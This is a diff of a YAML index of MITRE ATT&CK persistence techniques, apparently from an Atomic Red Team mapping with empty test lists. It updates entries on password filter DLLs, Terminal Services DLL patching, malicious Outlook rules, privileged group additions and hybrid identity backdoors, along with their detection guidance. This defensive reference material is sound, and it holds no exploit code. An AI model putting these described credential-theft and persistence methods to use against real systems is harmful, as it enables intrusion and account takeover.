-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29942,71 +30287,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -30015,24 +30349,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -30124,8 +30490,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -30156,71 +30522,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -30251,7 +30685,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -30306,13 +30740,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -30373,9 +30805,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -30384,7 +30816,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -30437,7 +30868,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -30458,12 +30889,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30547,11 +30977,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30564,7 +30993,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -30577,7 +31005,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -30607,7 +31034,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -30639,7 +31067,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30661,8 +31089,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -30688,7 +31114,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30714,36 +31140,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30751,9 +31175,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30762,21 +31186,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
